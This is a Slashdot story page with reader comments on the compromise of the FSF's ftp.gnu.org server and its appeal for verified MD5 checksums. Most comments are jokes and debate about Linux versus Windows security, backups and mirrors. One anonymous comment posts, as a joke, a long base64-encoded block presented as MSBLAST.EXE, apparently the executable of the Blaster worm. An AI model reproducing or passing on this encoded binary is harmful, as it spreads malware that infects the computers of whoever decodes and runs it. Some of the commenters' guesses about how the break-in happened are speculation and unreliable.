Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

FSF FTP Site Cracked, Looking for MD5 Sums

CmdrTaco posted more than 11 years ago | from the two-scoops-of-paranoia dept.

GNU is Not Unix 752

landley writes "The Free Software Foundation's FTP site at ftp.gnu.org has been "compromised", and they don't seem to have full backups. They've yanked a bunch of recent packages (and their whole alpha.gnu.org ftp site), and when I asked about it they responded 'Our FTP server was compromised, yes. We are beginning to find good MD5sums for files which have not yet been restored, and they will be available again Real Soon Now. If you can provide MD5sums for any of the files listed in MISSING-FILES, it would be very much appreciated.' " Update the FSF has a statement on the FTP site explaining the matter.

Sorry! There are no comments related to the filter you selected.

Correct MD5s (4, Funny)

Henry V .009 (518000) | more than 11 years ago | (#6686911)

Sure, I've got the "correct" MD5s right here. You trust me, don't you?

Re:Correct MD5s (4, Insightful)

brechmos (679454) | more than 11 years ago | (#6686960)

Yeah, but if enough people send in the same MD5 sums for each file, then it "should be" easy to confirm it is correct or not.

Surely, there aren't that many dishonest people, and if there were, then it would be hard for them all to get together and come up with the same MD5.

Re:Correct MD5s (4, Insightful)

Henry V .009 (518000) | more than 11 years ago | (#6687060)

The man of the million email addresses replies: Are they confirming MD5s in person, or over the phone, or by other electronic means? You have yet to master the art of paranoia, grasshopper.

Re:Correct MD5s (1)

Merk (25521) | more than 11 years ago | (#6687086)

(1..5000).times do
|i|
sender = "gnu_fan#{i}@yahoo.com"
...
end

All it takes is one clever dishonest person. Until PGP signatures become commonplace and people are able to build up a web of trust, it's pretty easy to fake this sort of thing using email.

Re:Correct MD5s (1)

brechmos (679454) | more than 11 years ago | (#6687179)

Yeah, but, surely it wouldn't be that hard to parse through a list of email addresses and MD5 and see which ones you can "trust". We do that everyday with spam filters.

ouch, saw this yesterday (3, Informative)

Barbarian (9467) | more than 11 years ago | (#6686917)

Did you know that some files are just about impossible to get anywhere else?

Re:ouch, saw this yesterday (0)

Anonymous Coward | more than 11 years ago | (#6687013)

ah - the wonderful stable world of lunix - this is sure to encourage thoughtful businesses to run their critical operations on this software.

Re:ouch, saw this yesterday (1)

FifteenSquids (647416) | more than 11 years ago | (#6687061)

I was unaware that Linux (the kernel) provided FTP services...

Blame FSF's poor sysadmin skills. (0)

Anonymous Coward | more than 11 years ago | (#6687020)

If they can't keep proper backups of things then they have the wrong people (and perhaps software) running the site.

Re:ouch, saw this yesterday (5, Funny)

gearheadsmp (569823) | more than 11 years ago | (#6687111)

Look no further than across the pond [mirror.ac.uk] , my friend! Faster downloads than iBiblio, and it's run by this guy [gentoo.org] . So dig [mirror.ac.uk] in [mirror.ac.uk] !

Have a floppy? (1, Insightful)

John Paul Jones (151355) | more than 11 years ago | (#6686922)

How hard is it to script a backup of MD5 sums to removeable media? Sheesh.

the $64,000 question: (1, Funny)

BobTheLawyer (692026) | more than 11 years ago | (#6686927)

was the server running NT?

Re:the $64,000 question: (0)

robslimo (587196) | more than 11 years ago | (#6686979)

According to netcraft.com, it's running Linux.

The compromise was probably a weak password or an inside job.

Re:the $64,000 question: (3, Insightful)

gazbo (517111) | more than 11 years ago | (#6687048)

Or maybe, JUST FUCKING MAYBE , Linux isn't some sort of magical bug free OS where every buffer is checked, every race condition averted, and every service that runs on it is guaranteed bug free.

Good God. The fact you can post that comment...no. You're just too much of an unthinking hero-worshipping idiot for me to finish. Yes, it was an inside job or a weak password. Anything except a vulnerability. Yes.

Re:the $64,000 question: (1)

ceejayoz (567949) | more than 11 years ago | (#6687143)

*claps*

Re:the $64,000 question: (0)

Anonymous Coward | more than 11 years ago | (#6687171)

Social engineering is a highly effective crack method. It also leaves fewer traces than a technical crack.

Someone doesn't have to be a zealot to start off with the working assumption that it was social engineering crack rather than a technical failure in some OS component.

Can the invective until there's more evidence, please.

Re:the $64,000 question: (3, Insightful)

Trigun (685027) | more than 11 years ago | (#6687077)

The compromise was probably a weak password or an inside job.

Which is why syslog should be on another secure computer, and dumped to paper in a locked room for high-security sites.

It won't help the recovery, but helps pinpoint the intrusion

Mirrors? (3, Interesting)

ryan76 (666210) | more than 11 years ago | (#6686930)

Are there no mirrors of this site?

Re:Mirrors? (1)

Deadbolt (102078) | more than 11 years ago | (#6687054)

That was my first thought too. There must be some mirrors that didn't update, or have the last known good copy of these files. I assume mirroring was shut off as soon as they discovered the breach. Some server in Russia somewhere has the known good distributions.

In Soviet Russia (-1, Offtopic)

JeffTL (667728) | more than 11 years ago | (#6687152)

GNU mirrors YOU!

Re:Mirrors? (4, Informative)

gearheadsmp (569823) | more than 11 years ago | (#6687166)

Mirror [gnu.org] , mirror [mirror.ac.uk] on the wall, who is the fastest of them all?

Lot'sa files (1, Informative)

guido1 (108876) | more than 11 years ago | (#6686932)

They need lots of help... There are 689 files on the list...

Eek!

Missing (-1, Redundant)

Anonymous Coward | more than 11 years ago | (#6686936)

The file MSBLAST.EXE seems to be missing from the server, as it seems to run an Illegal SCO Operating System instead of IIS. MD5SUM: 5ae700c1dffb00cef492844a4db6cd69

Base64 encoded:

begin-base64 600 msblast.exe
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAA AAAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIb gBTM0hVGhpcy Bwcm9ncmFt
IGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ 0KJAAAAAAAAA BQRQAATAED
ACp8Nz8AAAAAAAAAAOAADwELAQI3ACAAAAAQAA AAUAAA8HEAAA BgAAAAgAAA
AABAAAAQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAA CQAAAAEAAAAA AAAAIAAAAA
ABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAA AAAACAAABIAQ AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAAAFAAAA AQAAAAAAAAAA IAAAAAAAAA
AAAAAAAAAIAAAOBVUFgxAAAAAAAgAAAAYAAAAB QAAAACAAAAAA AAAAAAAAAA
AABAAADgVVBYMgAAAAAAEAAAAIAAAAACAAAAFg AAAAAAAAAAAA AAAAAAQAAA
wDEuMjIAVVBYIQwJAgnH/kZfgu7TdDBUAADREQ AAICwAACYBAD 3+//L/McBA
i0wkBPdBBAYAdA+LRCQIi1QkEIkCuAO5/3fvEM NTVlcSEFBq/m gAEEAAZP81
Ff/b3bkGiSUZIItYL3AMg/7/dCA7dH/Z3P8kJH QajTR2iwyzVB dIfLMEAHXX
d/+///9Uswjr0WSPBTWDxAxfXlvDVYnlXFVqAL 77724BaJJa/3 UI6AEAE0Bd
HInsXcP8e/v/7iCD7Agji10Mi0UIozBAJYkdNA V7az+290CudX KJRfgZrEX8
oxb7d/vtjQ2JQ/yLcy17CJFijQx2ge7W/mWPdD pWVY1rEIYLXV 5NW7bW/QnA
dCh4MSVTcpF2BB33u2WsVgwcCDaLBI+LQwwwvw v/XAglDzSP66 ws63FHav92
3dthKgy8xwUQeguOagtz2M3sQBQYX3UhGQi37w 7ICAe4OwDrJ4 P4oSpQLhv2
ClAkHg0Aug8h5pQoD4M9LBoAz97ewz7ooQ5y/+ BYENdkod0Mh6 FdNZ5oHBtV
sxCEZppQqkkQI7j/f4ll6FDZPCRmgQwkAAPZLC Rjfyhee/Z9Li QEIH4ToIkU
z7YX2QUkFkgUHBJQ1/H3bzcYMcmJTfxQKrjJwx GjZYc3x9/Dfo HsrDpsMfZq
ke+OubtQXz8AD2ZqXUhlAgAAgJ4d3z+IajJoPM YBBElI+L7ZB3 uUB3xoQ0gd
DUzhxx7+BAQ9t/kHEhLUjYVg6GvYuXb/UFFSEB H82i8ULcglDw EBGkz37Y1h
ESLI/+kLBWxoBCexN+Y2+TBpZxC328ZjW8MSRK 8MGk5HE1jrkf v7O/slLDFA
DTQhFDBZBQy5/pV7Ye6/mff5iddHiT0UShUVOD U+07mSQaSG/I TkuU/YOwEP
hPAAFMyJhVwL2D6ZrXcZ1kM5AAvKB9k2/kUEi0 CSMCxUE+hbYf ve/7ULN3ju
QCtJvZzs/T1XfSRoPhBaFEjeex+2WDmsoyiRIf SFFfLIHBAw/E p4c6U8ijy9
FH4fCA/f9+QUKRUjoWWjD6EK2zh8UqMGF0Y1D7 fUfoP6DH0CID k0KNZz9iFn
HQoHfgobAlPySngJ9nU8fCgxELDwWwmPnGoD5v QYrY+3Njzmmg koVLyULN/4
GPA6Lx/2byMDWfwPfw+NffBXDgh+Fvtmxx40L8 EeOBtwBHqp9b 0Hc+v5PwhA
zMnCEMnN5E4lLFWT6zhAOPzQujICAczAoyRgQf ij+x5FGWqRhd j9gX/b2K70
d2bHDwIbRTBUicKaOXf3ZomV2hGDpdwFMjAzO7 7nX0oj2FOF9j rZRrpm+BAJ
jVAG6CbsGN25BKHU+ziETqd334gBD4y8LzHbaD e/K9B87PqJ0L KJxqueQ5a7
uaw3i/yJ2CWKg0yn5rIV/lYH1Bcog9zRAP7cxM eDbJO9xscEz5 CPV8T8g/Td
haiLfCJohAORgaYbv7//snMLVg3EWTrrBdM6Fu zGBkgbdA4TEQ WIzrrMXLk4
QErwQuCcLhQelFuVjYE927b5nX4ifg/nLQUw6w gHLIdszyxHIj A7MBnk9phe
GBAwIiHbI3IQMIoxKOQYP8sHKOuWwwCMARDGiv BFkP12lOFOcL cWDNpohxo/
xvggHV91ljH/JQGJRL2wG6ajNd8DJli0kP9agy 9+ZgSAVxMzYE eD/9vZHuUU
fM6DwzUFMA9jnSMQMAQr0gAP6yBIIxMYDBFs7T XGElmshfmKC+ Rgr20OmKak
YRIU27cgfKBoCAePa4NlpAADqPvTGS6leN4GdO sZi7UIjb379o tcODmctXwK
dBT/hRKF2wM79ig5C3LZDXUcfEAtdnLZcxc5if 8jhz4ivdOkUB cLdx+QsfAh
bH0LAPDrOUWMyVxHi+kG5nw7uzjYBLYgX4A5EQ kl3MZL5s462f UuMcNZPzwe
sbg0KQe0tRNeMzfX8OpTBnasEocXwXWpvdtuqU E4aOwcnRML68 fN7ZMKn3UY
Mr2kjTXAjjSf2265EpvzpRJE5whB2IM0n4Po7W hEBAg8B3me53 gP9Oq00nwO
8rPY5oBHDA3O1iA4puw6NbptyBjrkNAnzGIlu3 cu9WADgiEA8O v4fuX87xyB
hYxmY4vv94p8XQkFColoHHJgb7A5BS4+cA57ka 1WzKomcOTWdE g8BgE8Iwjn
Ls+FvDwGeDDY5tlCkkt4u0gm7Z3N76gGpgjwwA IKELlk5JIQEI CAS0YuGYSE
tGTkkpG0uLjQ8ZIcudCM8QppMM7Wlkj4pB2cT9 5rtRchG+2vye tg5sgfoBDw
aB4CAynSXPq5HnIMyu0hdALI7SG73kIPQlwRy7 e5y8e9yhRaDE VsxBZizSEu
iw7XzJFem01PpGns3qwgY24FJGySs8kNT9Tmht hf2MlCq9TYSS wPtkEG6d6F
3xIH3t0oDVmf3GgfkzBUAgJLHbfJC8BAjsTZXs xzdhU9Gjtbws CEWGFvcoSe
S2gMEPztV0bv6G3ljQ4KQIA8AVdPLOnK+a78AJ z1h/UkaOgD6N vrC2jQRpb6
h/ZDg/sKfQmiOOcIZMrOcgJtDJA8W/Z8UltM/k d2eC9bR4O9FE EdDo+DTfCx
dB+MM4JEQPgpZGI1CFw22TvAJSgW+BegwFOW6E wkDDHS6w3+f+ uX74PDAg+3
7sKD6QKD+QF/7gnJdAXxEt8W0wMQidHB6eLTge NY/LF/EInKAd oQAcqJ0PfQ
JNko8IAQVpkIzTqWOMfKg6caEPhdQ00Wxu4F7O sJi0YMi0fi29 6rOIn4gV01
UUT8AZjazw+f7EdADodZMCzbyJJ7GVw3AxI0xx lYgB3EdQTJNB XDPhcPsAJm
YbQYk9rs4BtXVgwPMmoU9kgki7HtIfApvi6wUe ScAASckrBHqw dNSXd+ZiNu
I0YDfJRoF+19ckaH/1KLvRPJWmSJZBCeODMM2d QkmNBu/+nidy 7/bv/ficMg
gDhJs0JubuB9grvsX5aoCITGRexFaigW7i/brX Wt8A0F8moc9I AD9crGHLkG
DREw/Enpslvi2sfgKuRQ5QJBle4yRwcb5jrq2G 3L00Do/JQlmC 2ZBjypH3Y1
JpqJXfij6ANlD7+DgccKgef1VykVhgzC2CRkG9 tsYf8KwecQCc csDVvcDLYX
L5BqDPUDnAQbpNnaeg7YqCAZysZiBw48Yx/sLk weGuSwBILEEZ ILKzs79hB7
PbQeeAuAfioXPtIgVKgX/yXIUS+QkBmQzQQVC8 zQARmQAdTYkA EZkNzg5BmQ
ARno7PABGZAB9PgglxyQ/ABSBDIgAzIIDBBKMi ADFCCNf/lwkq sS7IA/InUj
aiLhJvhqpEAJPDBFfXL/27cpG0frAUcfIHT66x xHD74HFAIvc1 /f+CB18xYO
dPPThb+2dBzNVwlEAkxfX79/y6VZfwAQLQSFBC Q9B3PrG5Cx3S nEC//hmyww
CwEZkAE0OJABGZA8QEQZkAEZSExQARmQAVRYkA EZkFxgbBmQAR lwdIABGZAB
hIiQARmQjJCUGZABGZicoAEZkAGkqJABGZCssL RFBDYZuACoAI tA+RWy/Kkw
QAA8MUCA9u3/f21zYmxhc3QuZXhlAEkganUKIH dhbgTt////dG 8gc2F5IExP
VkUgWU9VIFNBTiEhAGJpbGwU/bdt+2dhdGVzJm gJZCV5b3UgbW FrZdrWfrsx
aGkUcG9zc2lRDT8xW3v720JwGWluZwZvbmUtV2 S729v3IGZpeD JyXW9mdGly
ZVUFAD1vmu4LAxCbSH/QFtAWAc/Z2e4DAaABq8 AGRgTmKv7/XY iK6xzJEZ/o
CAArEEhgS0f7nuXIAOgD5QM/BBf//1+sBksAMi RY/cxFZEmwcN 2udCyW0mDp
PjfZXg0bcAtHfBMAm///phCAlvHxKk3OEaZqAC CvbnL0DE1BEf 9+2FJCMw3w
rboHqPQLALLmmzM2Ax9FT1cEordg3ZUdOAPHMB MoF/hmu+0BEM vMAMgAQxfY
H0CaQb8CB8QozQA2ZF/sZCnNCx+5c6sPQzIkQ6 WmpCRDMiStqq Zpui9zYANY
kEAZsPeaIHjb09dQBQLpvk+2iCD/AACE/AiHX0 gDZgAGCQK8Bx vYECsHeBkM
s9z9/2QbcNiYk5hP0hGpPb5XslcyADEnbAmTgO cAGEMS3nNA8f 8D9zFAhuTA
O2H//4PbgcUXA4AO6UqZmfGKUG96hQLjbIQBG+ cwX24jbLIned jaDSAvDAsD
B2OXxQZG6T8Qfy4XNlMIR2gOAKNoixuwZY8Ld1 8HXAHub+geQw AkBTEtMwA0
ADUANgvBfhtkAXNkAG8AY5MxLGXvTgBCBwsDCw j7/ifM4P1/A5 AA3/13/+sZ
XjHJgemJuYE2gL8ylIHu/Avi8usF6P6//bviCA NTBh90V3WVGr uSf4laGs6x
3nzhvva3/98mCfk6a7bXn02FcdrGgTYdxrNa+O wH+d3///yzjR zw6MhBpt/r
zcKINnSQM+Z+DCR8rf8jvxkiTExizNqKq83ihN f5eXyE8/zP2N qaD6frnXUS
2mqAo+RHRv6WjvB42nqfOa5W2kr/jPxnm9fdBv baWpfV7UbG2t /d/ZEqkwFr
AVOiu2b8gbN/6SrE0Pn////vYtTQ/2Jr1qO5TN foWpaArm4fTN UkxdNAZLTX
7P//v32k6GPHJxofUNdX7OW/Wvft2xwd5o+xeN QyDnT///+ws3 8BXQN+Jz9i
QvTQpK92asSbDx3Um3oDfl1e/t9iGcSbIsDQ7m PF6r5/yQLpIn /bvtxbzWux
mAt3ZXOTX5TqZPAhjxX+9m+LgDry7Iw0chfPLj kL1zom////vw ugCxeKlIC/
uVHe4vCQgOxnwtc0XrCYNHeoC+s37NuF//KDar neaLSDYtGmyT STg0rbfMv2 //+M8ji6e0aTQXA/l3hUwK/8mybhYSOwVO7+//8fjPS5zpy87x +ENDFRa70B
VAtqbcrd5FcvogQfaWSSVyAtt4gqDADAGnuQAi iMDAcH679EiQ F3TnR3c3Vw
ZKLEfxOELmNvbQAlcwoAtVHiK1FJswl0Vdhj7y 51LWkLIEdFVB IlZC4CU+tD
fgAlaS4AcmKxj8M2llwuQXxJR1lc/8zEEqh1/m IAU09GVFfsE/ 8G8EVcTWlj
cm+1XFcmW5Qo8VxDxr8rVr1eosRlcvPgXFJ1kg JJBYUAXlkvIh RW/1xWklfy
SnhWBFa2F5G8qFXAUgPIbJqmadjk8PwIU9M0Tb MQHCw4SE3TNE 1QYHCAkJzA
Lts0rLxTV8wLpjO7Zuj4TwhUAzCapmmaQFhsfI yYd9mmaaiwxF Q/1BOdOyBN
5PgMVUsDJDRN0zQsOEBIVNM0TdNgaHB8iLaqsk 2QnFX7AwI5QR VQQBuykS1b
ACgTmbIAmQNHPMwlbJgDcg8DEYFUiGABgsAWDJ P/L5uoLEIBRX hpdFByb2Nl
c3NLwL/9VGhyZWFkC0dldENvbW2ATNtLNPZpbm VBEETdRm9yFH TbbgFnD0wG
RXI9cg323rYfTW9kdWwfaQNOYW0xEwX7101IRW wRQ2xvcw3ot7 ePHlRpY2tl
dW50DVJ0bFVu227OuU0lgWhNdQN4M661261TK2 VwBlRldx0X2W azYaAlDdC1
N3vsp2xSZWdlS2V5DCb3W/e+DUVMEFN2VmFsdW UP2/dpNjbCgF 9frWFhQTML
N8NyZwkyb2kPZQXN3Lt3ZmNPB29wZW4GfrWuxb 7hbWNweQccJX I7221/7SQG
wXNpZ6psB3ByUVh7MHd0ZggXdHJjsAe1p9m2YG t+zSBJJbdthL bfbkd1bghj
DmRTtmazuXS4I9nIQWgybt+2UOiaaawqcwRrdW m7Bbt1M1+OZH IKRm9hhG5X
aJs/dqa9aGVsS97X3nsHfgUgB3RAt22w188ZSW cEaOZ0Yhbs7L Z5uG3HYmkU
EnMfFmEGLldTQZ/F9rU2dnVwC0Nm4AtjvY25Qm w6LtM6Z4mxN5 twDDpFQSo/
5L88UEVMAQQAKnw3P+AADwE4sgX8CwECNwAWzB LLEeDsOyFgMC FACwLLDpsk
nwQ8YAxPLDtzHjQQB6QQiuRyIFDABq8h6Lgu33 QHFJCXBCx7B7 c/YNhnANMu
YptH6DBLw1J1F4DCLnxhHlzY2GSMCAcaJ0DYZG /2aSjz+yQnRn zPXGAbAIxP
AAAAgABAAgD/AAAAAAAAAAAAAGC+FWBAAI2+66 ///1eDzf/rEJ CQkJCQkIoG
RogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHo Pu/BHbEcAB23 PvdQmLHoPu /BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEc kB23UHix6D
7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CY seg+78Edtz5I PBAoH9APP/ /4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBI PpBHfxAc/p
TP///16J97mjAAAAigdHLOg8AXf3gD8BdfKLB4 pfBGbB6AjBwB CGxCn4gOvo
AfCJB4PHBYnY4tmNvgBQAACLBwnAdDyLXwSNhD AAcAAAAfNQg8 cI/5Z4cAAA
lYoHRwjAdNyJ+VdI8q5V/5Z8cAAACcB0B4kDg8 ME6+H/loBwAA Bh6Yee//8A
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAKiAAAB4gAAAAA AAAAAAAAAAAA AAtYAAAIiA
AAAAAAAAAAAAAAAAAADCgAAAkIAAAAAAAAAAAA AAAAAAAM2AAA CYgAAAAAAA
AAAAAAAAAAAA2YAAAKCAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAO SAAADygAAA
AoEAAAAAAAAQgQAAAAAAAB6BAAAAAAAAJIEAAA AAAABAgQAAAA AAAEtFUk5F
TDMyLkRMTABBRFZBUEkzMi5ETEwAQ1JURExMLk RMTABXSU5JTk VULkRMTABX
UzJfMzIuRExMAAAATG9hZExpYnJhcnlBAABHZX RQcm9jQWRkcm VzcwAARXhp
dFByb2Nlc3MAAABSZWdDbG9zZUtleQAAAGF0b2 kAAEludGVybm V0R2V0Q29u
bmVjdGVkU3RhdGUAAABzZW5kAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC AAAAAAAAAAIA AAAAAQAAAA
JgAAADAAAABCAAA=
====

Any word on how the crackers got in? (1, Interesting)

Squeezer (132342) | more than 11 years ago | (#6686937)

how did the crackers break into the ftp site? anyone know?

Re:Any word on how the crackers got in? (2, Funny)

Anonymous Coward | more than 11 years ago | (#6687017)

how did the crackers break into the ftp site? anyone know?

someone guessed the root password "itsGNUlinux!!!"

Re:Any word on how the crackers got in? (1)

Chess_the_cat (653159) | more than 11 years ago | (#6687079)

Considering that FTP passwords are transmitted as plain text over the network it probably wasn't too hard.

It's FTP, need you ask? (0)

Anonymous Coward | more than 11 years ago | (#6687099)

Never, ever, EVER run an FTP server - you are committing suicide by doing so. You are asking in big bold block letters posting your IP to slashdot to get hacked. Always make your files available to the public via HTTP/SSL in a chroot filesystem that is set no-write. Uploading of new files should be via SMTP (through trusted hosts)w/ PGP or worst-case (if you're a usability freak) (OpenSSH) SSH2 + SFTP.

People use solutions other than this. I do not understand why outside of willful stupidity.

--Ryv

Re:It's FTP, need you ask? (1)

Electrum (94638) | more than 11 years ago | (#6687118)

Never, ever, EVER run an FTP server - you are committing suicide by doing so.

Anonymous FTP is fine.

Re:Any word on how the crackers got in? (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#6687107)

They figured out what the user id and password were. Or are. Think they might have changed them by now?

Geeks are not very bright. They just think they are.

mod away pudknockers

Well that's good and all, but (1, Interesting)

dodell (83471) | more than 11 years ago | (#6686938)

How was the site cracked? What have they done to patch it? Was it GNU software? :-D Are they writing patches for this software? MORE NEWS.

Re:Well that's good and all, but (5, Informative)

rkz (667993) | more than 11 years ago | (#6687019)

Crackers exploited this [debian.org] vunerability, there was even a patch available!!

Oh crap (2, Insightful)

Anonymous Coward | more than 11 years ago | (#6686939)

GNU is the definitive location of loads of packages. Virtually everyone who uses Linux is potentially affected. It's as if Windows Update were cracked. I don't see anything on the main GNU page yet though...

Ouch (-1, Offtopic)

kindbud (90044) | more than 11 years ago | (#6686942)

First Post?

Wait? I thought Linux was Secure?? (2, Insightful)

FortKnox (169099) | more than 11 years ago | (#6686945)

I'll wait while the "wind0ze suX0rs!" 1337 Hackors try to make this sound insignificant to linux, but can blow up on MS when a virus is released.

Just a healthy reminder that nothing is 100% secure, so no point in pointing fingers (on MS OR linux).

Re:Wait? I thought Linux was Secure?? (0)

Anonymous Coward | more than 11 years ago | (#6686970)

Linux is secure. It's GNU/Linux that isn't!

[rimshot]

Re:Wait? I thought Linux was Secure?? (2, Informative)

saskwach (589702) | more than 11 years ago | (#6687049)

I think you want OpenBSD [openbsd.org] ...7 years running, 1 remote hole in the default install. (I think it was patched within 3 days, but am too lazy to look it up.)

Not 100%, but 99.9%, sure.

Re:Wait? I thought Linux was Secure?? (2, Insightful)

JeffTL (667728) | more than 11 years ago | (#6687069)

It IS insignificant as far as security is concerned, because it's almost certainly an inside job or a password theft. It'd be insignificant even if it were on an MS-DOS webserver. The only reason this is on /., or is significant in any way, is that GNU is the victim and evidently they haven't been doing proper backups.

Finnishing move (4, Funny)

palad1 (571416) | more than 11 years ago | (#6686948)

After getting their FTP server rammed in the sockets, I bet the maintainers of ftp.gnu.org will be just more than happy to go through a good ol' slashdotting because someone _has_ to convert urls into hyperlinks for his /. submission.

I know, I clicked on the link :)

SCO (4, Funny)

Amon Re (102766) | more than 11 years ago | (#6686952)

Hmm odd...one day they speak of taking sco support out of gcc, the next their ftp server gets comprised, interesting.

Re:SCO (0)

Anonymous Coward | more than 11 years ago | (#6686993)

Yeah, I do find it hard to beleive that GNU would be a target for crackers. I mean why attack an organisation that is giving you something for nothing!

The kids of today eh?

Re:SCO (1)

dr_dank (472072) | more than 11 years ago | (#6687139)

gcc had a secretary named SCO and SCO had a secretary named gcc. Oliver Stone, where are you?

Can someone please tell me... (-1, Flamebait)

anaesthesis (667111) | more than 11 years ago | (#6686963)

What FTP server were they running? Was it a Microsoft FTP server? Because the guy who runs Linux down at my school says that only M$ (he seems insistent on using the dollar sign, for some reason) servers get hacked. He told me to use "open source" servers because they are secure, and stable, "unlike their Windows counterparts." Was he lying?

Re:Can someone please tell me... (2, Interesting)

Planesdragon (210349) | more than 11 years ago | (#6687033)

Was he lying?

Only as much as a priest of a false religion is lying.

Microsoft servers _do_ get hacked more than Linux servers, but this is because there are far more MS servers of an identical configuration than there are Linux servers. They also tend to crash more--especially IIS.

So, Linux does get hacked, and there have been viruses written for Linux--but there are far far more hackers and virus-writers aimed at MS Windows as opposed to Linux.

Re:Can someone please tell me... (2, Informative)

E-Rock (84950) | more than 11 years ago | (#6687068)

Well no OS is proof against shitty passwords or real bad practices (like not running backups). As usual the most important factor is the quality of your admin, not the OS.

Obg. (5, Funny)

Rosonowski (250492) | more than 11 years ago | (#6686964)

"Real men don't use backups, they post their stuff on a public ftp server and let the rest of the world make copies." - Linus Torvalds

Another CLE? (1, Funny)

NetNinja (469346) | more than 11 years ago | (#6686965)

Career Limiting Event?

Let me get this straight.... (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#6686969)

Stallman wants us to listen to his people, and do what he says....when the Bitkeeper people keep backups?

Of course, if this was a MS site that was (2, Insightful)

Anonymous Coward | more than 11 years ago | (#6686972)

'compromised', the /. crowd would be laughing their heads off. Just goes to show that 'open source' or 'free software' isn't 100%, and the "no backups" just goes to show that poor sysadmin skills is not limited to proprietary platforms.

I have the files (5, Funny)

Zabu (589690) | more than 11 years ago | (#6686973)

But do to some sort of wierd computer problem my machine keeps on restarting...


I will get around to fixing it sometime next week.

Re:I have the files (0)

ikkonoishi (674762) | more than 11 years ago | (#6687098)

If you use windows you probally have the blaster virus.

Check your task mangager for something called "msblast.exe"

If you have it go here [zdnet.co.uk]

Put your glove on (3, Funny)

Zabu (589690) | more than 11 years ago | (#6687165)

Then next time you will catch the joke...

So apache no invulnerable then... (-1, Troll)

ColdGrits (204506) | more than 11 years ago | (#6686974)

...if this was a site hosted on IIS, then we would already be flooded with posts laughing at how insecure M$ systems are and gloating how this doesn't happen with open source systems.

Yet here we have a site which one woudl have expected to be rather well secured, and it's been cracked.

I guess that blows the "Apache is absolutely secure" myth.

Re:So apache no invulnerable then... (1)

Garfunkel (3569) | more than 11 years ago | (#6687018)

Can you please point me as to where it says Apache was cracked? Please? If you'd even glanced at even the summary it says "FTP server", Apache is not an FTP server.
I guess this blows the "slashdotters know what they are talking about" myth. Oh wait......

Re:So apache no invulnerable then... (1)

Directrix1 (157787) | more than 11 years ago | (#6687116)

Who here believes Apache is absolutely secure? I see vulnerability/exploit reports fairly frequently.

Re:So apache no invulnerable then... (1)

kpansky (577361) | more than 11 years ago | (#6687027)

Apache? What the hell are you talking about? This was an FTP breach. Absolutely nothing to do with Apache.

Re:So apache no invulnerable then... (1)

PepsiProgrammer (545828) | more than 11 years ago | (#6687041)

Yes, but I'm not of anyone who claims their software is "absolutely secure" and from what has been said so far it is not apache that has been cracked (http) but their ftp server (I am unaware what ftp server they run) What makes people complain about how insecure MS systems is the fact that the insecurities occur much more often than in open source equivilants, and that ms is generally MUCH slower to patch the vulnerabilities

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687046)

apache is an HTTP server, we're discussing an FTP server issue

Re:So apache no invulnerable then... (1)

jyak (112533) | more than 11 years ago | (#6687047)

Actually....it doesn't. They have not said if the ftp software was vulernable or it is was actually hacked. They only said the ftp server was compromised. Someone unauthorized could have gained access to the server. Who knows....

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687073)

we need a RTFA (and please understand the motherfucker before you post) moderation

Re:So apache no invulnerable then... (1)

gowen (141411) | more than 11 years ago | (#6687078)

I guess that blows the "Apache is absolutely secure" myth
Hmmm. Apache is a Web server. The FSF had their FTP server cracked -- I don't know which they use, possibly wu-ftpd. I don't think this reflects on Apache at all.

But then, unlike you, sir, I am not an idiot.

Re:So apache no invulnerable then... (1)

rokzy (687636) | more than 11 years ago | (#6687090)

you claim there's no gloating when open source is hacked, but this is one of many gloats to this effect already posted.

Re:So apache no invulnerable then... (1)

reddfoxx (534534) | more than 11 years ago | (#6687101)

You do realize that Apache is a http server don't you? If you are serving FTP through your webserver I think that you have more problems than whether the software is secure.

Re:So apache no invulnerable then... (1)

chef_raekwon (411401) | more than 11 years ago | (#6687140)

maybe i missed something, but isnt the problem with an ftp server? and probably one that was not chrooted??

